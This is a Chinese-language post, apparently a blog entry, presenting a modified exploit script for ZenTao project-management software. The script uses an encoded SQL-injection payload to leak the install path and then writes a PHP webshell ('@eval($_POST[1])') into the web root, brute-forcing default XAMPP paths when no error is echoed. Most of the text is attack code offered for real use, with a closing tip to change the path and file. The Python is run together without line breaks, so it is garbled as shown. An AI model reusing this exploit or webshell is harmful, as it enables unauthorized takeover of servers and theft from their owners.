这里不做具体显示,仅修改一下exp,以检测poc无回显的状态
jas502n/zentao-getshell
发送该报错poc时候,通过报错获取服务路径,然后在对应目录下写入文件,如果遇到无回显状态时,无法进行下一步利用
{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}
直接通过fuzz的方式遍历默认路径,写入文件,当然了,要是存在phpinfo界面的话,获取到服务路径,直接写入即可。
# coding=utf-8
import requests
import base64
import re
import sys
import random
import string
import json
from fake_useragent import UserAgentbanner = '''usage: python exp.py http://127.0.0.1:81/
'''
print(banner)def urlwrite(url,get_shell):hex_str = get_shell.encode('hex')payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_strgetshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(payload1)headers = {"Referer": "%s/zentao" %url,"User-Agent": new_ua}r1 = requests.get(url=getshell_url, headers=headers)if r1.status_code == 200:webshell = url + "/zentao/" + filenamer2 = requests.get(url=webshell)if r2.status_code == 200 and 'aaa' in r1.content:print("\n\n>>>>Webshell: \n%s" % webshell)else:print("写入失败")else:print("写入失败")
def get_web_dir(url, filename):if url[-1] == '/':url = url[:-1]else:url = urlpayload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''base64encode_str = base64.b64encode(payload)web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_strversion_url = url + "/zentao/index.php?mode=getconfig"r0 = requests.get(url=version_url)json_str = json.loads(r0.text)print("Cuurent Version= " + json_str['version'])headers = {"Referer": "http://127.0.0.1:81/zentao","User-Agent": new_ua}r = requests.get(url=web_dir, headers=headers)if r.status_code == 200 and 'SELECT' in r.content:print('\n')m = re.compile(r'.*in <strong>(.*)</strong> on')www_dir = m.findall(r.content)[0]www_root = www_dir.replace('\\', "//")print(www_root)m = re.compile(r'(.*)framework', re.DOTALL)# print '>>>>WWWROOT INSTALL: ' +get_shell = "select '<?php echo 'aaa';?>' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename)print('\n%s\n' % get_shell)elif r.status_code == 200:for i in ["C","D","E"]:get_shell = "select '<?php @eval($_POST[1])?>' into outfile %s:\\zentao\\xampp\\zentao\\www\\%s" %(i,filename)print('\n%s\n' %get_shell)else:print("出错")urlwrite(url,get_shell)
if __name__ == "__main__":url = sys.argv[1]characters = string.ascii_lowercase + string.digitsfilename = random_string = ''.join(random.choice(characters) for _ in range(5))ua = UserAgent()new_ua = ua.randomif url:get_web_dir(url, filename)else:print("url为空")
适当修改,只是检测脚本,实际中,修改路径,修改写入的文件即可